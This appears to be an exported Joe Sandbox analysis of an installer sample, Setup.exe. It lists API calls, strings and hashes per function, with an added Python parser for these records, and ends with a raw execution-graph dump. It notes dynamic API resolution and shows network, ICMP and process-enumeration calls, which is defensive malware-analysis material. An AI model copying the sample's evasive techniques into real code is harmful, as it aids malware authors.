                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatwsprintf
                                                                  • String ID: %02x%c$...
                                                                  • API String ID: 3065427908-1057055748
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 00405083
                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                  • String ID: Section: "%s"$Skipping section: "%s"
                                                                  • API String ID: 2266616436-4211696005
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00402100
                                                                  • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                    • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                  • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                  • String ID:
                                                                  • API String ID: 1599320355-0
                                                                  APIs
                                                                    • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                  • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                  • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                  • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcpyn$CreateFilelstrcmp
                                                                  • String ID: Version
                                                                  • API String ID: 512980652-315105994
                                                                  • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                  • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                  • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                  • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                  • GetTickCount.KERNEL32 ref: 00403303
                                                                  • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                  • String ID:
                                                                  • API String ID: 2102729457-0
                                                                  • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                  • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                  • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                  • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                  • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                  • String ID:
                                                                  • API String ID: 2883127279-0
                                                                  • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                  • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                  • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                  • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040492E
                                                                  • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                    • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                  • String ID:
                                                                  • API String ID: 3748168415-3916222277
                                                                  • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                  • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                  • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                  • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                  APIs
                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                  • String ID: !N~
                                                                  • API String ID: 623250636-529124213
                                                                  • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                  • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                  • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                  • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                  APIs
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                  • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                  Strings
                                                                  • Error launching installer, xrefs: 00405C74
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateHandleProcess
                                                                  • String ID: Error launching installer
                                                                  • API String ID: 3712363035-66219284
                                                                  • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                  • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                  • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                  • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                    • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                  • API String ID: 3509786178-2769509956
                                                                  • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                  • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                  • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                  • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                  • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 190613189-0
                                                                  • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                  • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                  • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                  • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4
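
The per-function records above are far easier to work with once parsed: which functions launch processes, which resolve imports by name, which strings are referenced where. The following parser is an added example written for this page; it is not Joe Sandbox code and not part of the report. It assumes only the layout visible in this text export (each record opens with an "APIs" block of `Name.MODULE(args), ref: ADDR` bullets, subcall entries carry a `Part of subcall function X:` prefix, an optional "Strings" block holds `text, xrefs: ADDR` bullets, and the remaining blocks are `Key: value` bullets); `SAMPLE` is copied from four of the records above, including the export quirk where the "Download File" link text is glued onto the dump-file names. A structured export from the sandbox is the better input for production tooling when one is available.

```python
"""Parse Joe Sandbox per-function API summaries (the records above) into
queryable Python objects. Added example, not Joe Sandbox or report code;
the record layout is inferred from the report text, SAMPLE is copied from it."""
import re
from dataclasses import dataclass, field

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
REF_RE = re.compile(r"^(?P<call>.*?)\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*(?P<rest>.*)$")
XREF_RE = re.compile(r"^(?P<text>.*),\s*xrefs:\s*(?P<addr>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+):\s*(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str              # call-site address from "ref: ..."
    subcall_of: str = ""  # callee address for "Part of subcall function X:" lines


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)  # (text, xref address)
    meta: dict[str, str] = field(default_factory=dict)            # key/value blocks


def split_args(s):
    """Split on top-level commas only, so RemoveDirectory("%s") stays one argument."""
    out, cur, depth = [], [], 0
    for ch in s:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            out.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    tail = "".join(cur).strip()
    return out + [tail] if (out or tail) else []


def parse_api_line(body):
    sub = ""
    if m := SUBCALL_RE.match(body):
        sub, body = m["fn"], m["rest"]
    if not (m := REF_RE.match(body)):
        return None
    head, _, rest = m["call"].partition("(")   # "GetTickCount.KERNEL32 ref: ..." has no "("
    name, module = head.split(".", 1)
    args = split_args(rest[: rest.rfind(")")]) if rest else []
    return ApiCall(name, module, args, m["ref"].upper(), sub)


def parse_records(text):
    records, cur, section = [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if line in HEADERS:
            section = line
            if line == "APIs":                   # every record opens with its APIs block
                cur = FunctionRecord()
                records.append(cur)
        elif line and cur is not None:
            body = line.lstrip("•").strip()
            if section == "APIs" and (call := parse_api_line(body)):
                cur.apis.append(call)
            elif section == "Strings" and (m := XREF_RE.match(body)):
                cur.strings.append((m["text"], m["addr"].upper()))
            elif section not in ("APIs", "Strings") and (m := KV_RE.match(body)):
                # The HTML export glues the "Download File" link text onto dump names.
                cur.meta[m["key"]] = m["value"].removesuffix("Download File").strip()
    return records


def functions_calling(records, *names, own_only=True):
    """Records whose API set contains every name; subcall entries are excluded by default."""
    want = set(names)
    return [r for r in records
            if want <= {c.name for c in r.apis if not (own_only and c.subcall_of)}]


# Constructed sample: copied from four of the function records in this report.
SAMPLE = """\
APIs
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
• CloseHandle.KERNEL32(?), ref: 00405C9D
Strings
• Error launching installer, xrefs: 00405C74
Memory Dump Source
• Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• API ID: CloseCreateHandleProcess
• API String ID: 3712363035-66219284
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
• GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
• GlobalFree.KERNEL32(00000000), ref: 004063CA
APIs
• lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
• wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
Strings
APIs
• GetTickCount.KERNEL32 ref: 00403303
"""
```

Two details matter when turning these records into a per-function API profile. First, the indented `Part of subcall function` entries belong to the callee, not to the function whose record they appear in; `functions_calling` therefore ignores them unless `own_only=False`, so the `CloseHandle` inherited by the `lstrlenW`/`wvsprintfW` record is not mistaken for a direct call. Second, the combination `WideCharToMultiByte` followed by `GetProcAddress` in one record is the shape of an import-by-name resolver (a wide-character API name converted to ANSI and looked up at run time), which is what the report's "Contains functionality to dynamically determine API calls" signature is pointing at; querying `functions_calling(parse_records(SAMPLE), "GetProcAddress", "WideCharToMultiByte")` isolates that record directly.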

                                                                  Execution Graph

                                                                  Execution Coverage:3.3%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:3.5%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:53
                                                                  execution_graph: the serialized node/edge listing (node IDs, function addresses, edges, and per-node API annotations such as EnterCriticalSection/LeaveCriticalSection, SetEvent/ResetEvent, WaitForSingleObjectEx, RaiseException and GetLastError alongside the __wsopen_s, __Init_thread_footer and pre_c_initialization runtime helpers) is not reproduced in text form. Note that the node addresses in this graph (0x62xxxx to 0x6Axxxx) lie outside the 0x400000-based Setup.exe image that the function records above cover.
96781 628a60 8 API calls 96779->96781 96809 6667bd 96779->96809 96780 627e12 8 API calls 96782 628d4e 96780->96782 96781->96809 96784 666873 96782->96784 96785 628d5c 96782->96785 96787 628d27 96783->96787 96791 6668bc 96784->96791 96792 66687d 96784->96792 96789 628d71 96785->96789 96790 66696e 96785->96790 96788 628ec0 52 API calls 96787->96788 96788->96811 96794 628470 8 API calls 96789->96794 96796 628470 8 API calls 96790->96796 96793 628470 8 API calls 96791->96793 96797 628470 8 API calls 96792->96797 96798 6668c5 96793->96798 96799 628d79 96794->96799 96795 62893c 8 API calls 96795->96809 96800 66697b 96796->96800 96801 666885 96797->96801 96802 628a60 8 API calls 96798->96802 96803 62bd57 8 API calls 96799->96803 96805 628a60 8 API calls 96800->96805 96806 628ec0 52 API calls 96801->96806 96808 6668e1 96802->96808 96803->96830 96804 628a60 8 API calls 96804->96809 96805->96830 96807 666897 96806->96807 97280 628844 8 API calls __fread_nolock 96807->97280 96815 628ec0 52 API calls 96808->96815 96809->96795 96809->96804 96834 628e71 96809->96834 97279 628844 8 API calls __fread_nolock 96809->97279 96811->96780 96812 6668ab 96814 62893c 8 API calls 96812->96814 96816 6668b9 96814->96816 96818 6668fc 96815->96818 96822 628a60 8 API calls 96816->96822 97281 628844 8 API calls __fread_nolock 96818->97281 96819 6669f1 96825 62893c 8 API calls 96819->96825 96820 6669c1 96820->96819 96823 6669e5 96820->96823 96822->96834 97282 62ad40 8 API calls __fread_nolock 96823->97282 96829 6669ff 96825->96829 96826 666910 96827 62893c 8 API calls 96826->96827 96827->96816 96832 628a60 8 API calls 96829->96832 96830->96820 96830->96834 97264 628844 8 API calls __fread_nolock 96830->97264 97265 62893c 96830->97265 97268 628a60 96830->97268 96831 6669ef 96833 666a12 96832->96833 96835 62bd57 8 API calls 96833->96835 96834->96663 96835->96831 96838 6aa5c5 96836->96838 96837 628ec0 52 API calls 96839 6aa632 96837->96839 96838->96837 96841 6aa5d4 96838->96841 97286 6918a9 
96839->97286 96841->96663 96843 628ec0 52 API calls 96842->96843 96844 63ac68 96843->96844 97327 63bc58 96844->97327 96846 63ac7f 96847 62c98d 39 API calls 96846->96847 96852 63b09b _wcslen 96846->96852 96847->96852 96848 63bbbe 43 API calls 96848->96852 96850 627ad5 8 API calls 96850->96852 96851 626c03 8 API calls 96851->96852 96852->96848 96852->96850 96852->96851 96853 63b1fb 96852->96853 96856 628ec0 52 API calls 96852->96856 96857 62c98d 39 API calls 96852->96857 96858 628577 8 API calls 96852->96858 97332 62396b 96852->97332 97342 623907 96852->97342 97346 644d98 96852->97346 97356 62ad40 8 API calls __fread_nolock 96852->97356 97357 627b1a 8 API calls 96852->97357 96853->96663 96856->96852 96857->96852 96858->96852 96862 628ec0 52 API calls 96861->96862 96863 6aad63 96862->96863 97398 68dd87 CreateToolhelp32Snapshot Process32FirstW 96863->97398 96865 6aad72 96865->96663 96867 6a0fe1 96866->96867 96868 6a100f WSAStartup 96867->96868 96869 62c98d 39 API calls 96867->96869 96870 6a1054 96868->96870 96890 6a1023 messages 96868->96890 96872 6a0ffc 96869->96872 97417 63c1f6 96870->97417 96872->96868 96875 62c98d 39 API calls 96872->96875 96874 628ec0 52 API calls 96876 6a1069 96874->96876 96877 6a100b 96875->96877 97422 63f9d4 WideCharToMultiByte 96876->97422 96877->96868 96879 6a1075 inet_addr gethostbyname 96880 6a1093 IcmpCreateFile 96879->96880 96879->96890 96881 6a10d3 96880->96881 96880->96890 96882 64017b 8 API calls 96881->96882 96883 6a10ec 96882->96883 97430 62423c 96883->97430 96886 6a112b IcmpSendEcho 96888 6a114c 96886->96888 96887 6a1102 IcmpSendEcho 96887->96888 96889 6a1212 IcmpCloseHandle WSACleanup 96888->96889 96889->96890 96890->96663 96892 64017b 8 API calls 96891->96892 96893 69f95b 96892->96893 96894 62423c 8 API calls 96893->96894 96895 69f965 96894->96895 96896 628ec0 52 API calls 96895->96896 96897 69f97c GetEnvironmentVariableW 96896->96897 97435 69160f 8 API calls 96897->97435 96899 69f999 messages 96899->96663 96901 6a7b38 
96900->96901 96902 6a7b52 96900->96902 97436 693fe1 81 API calls __wsopen_s 96901->97436 96904 6a60e6 8 API calls 96902->96904 96905 6a7b5d 96904->96905 96906 630340 206 API calls 96905->96906 96907 6a7bc1 96906->96907 96908 6a7c5c 96907->96908 96909 6a7c03 96907->96909 96910 6a7b4a 96907->96910 96911 6a7c62 96908->96911 96912 6a7cb0 96908->96912 96917 69148b 8 API calls 96909->96917 96910->96625 97437 691ad8 8 API calls 96911->97437 96912->96910 96913 628ec0 52 API calls 96912->96913 96915 6a7cc2 96913->96915 96918 62c2c9 8 API calls 96915->96918 96916 6a7c85 97438 62bd07 8 API calls 96916->97438 96920 6a7c3b 96917->96920 96921 6a7ce6 CharUpperBuffW 96918->96921 96922 632b20 206 API calls 96920->96922 96923 6a7d00 96921->96923 96922->96910 96924 6a7d53 96923->96924 96925 6a7d07 96923->96925 96926 628ec0 52 API calls 96924->96926 96928 69148b 8 API calls 96925->96928 96927 6a7d5b 96926->96927 97439 63aa65 9 API calls 96927->97439 96930 6a7d35 96928->96930 96931 632b20 206 API calls 96930->96931 96931->96910 96932 6a7d65 96932->96910 96933 628ec0 52 API calls 96932->96933 96934 6a7d80 96933->96934 97440 62bd07 8 API calls 96934->97440 96936->96666 96937->96623 96938->96633 96939->96637 96940->96651 96941->96651 96942->96661 96943->96661 96944->96661 96945->96657 96946->96661 96947->96741 96948->96743 96949->96744 96950->96747 96952 628ec0 52 API calls 96951->96952 96953 6a89ed 96952->96953 96975 6a8a32 messages 96953->96975 96989 6a9730 96953->96989 96955 6a8cde 96956 6a8eac 96955->96956 96960 6a8cec 96955->96960 97047 6a9941 59 API calls 96956->97047 96959 6a8ebb 96959->96960 96961 6a8ec7 96959->96961 97002 6a88e3 96960->97002 96961->96975 96962 628ec0 52 API calls 96980 6a8aa6 96962->96980 96967 6a8d25 97016 63ffe0 96967->97016 96970 6a8d5f 97021 627e12 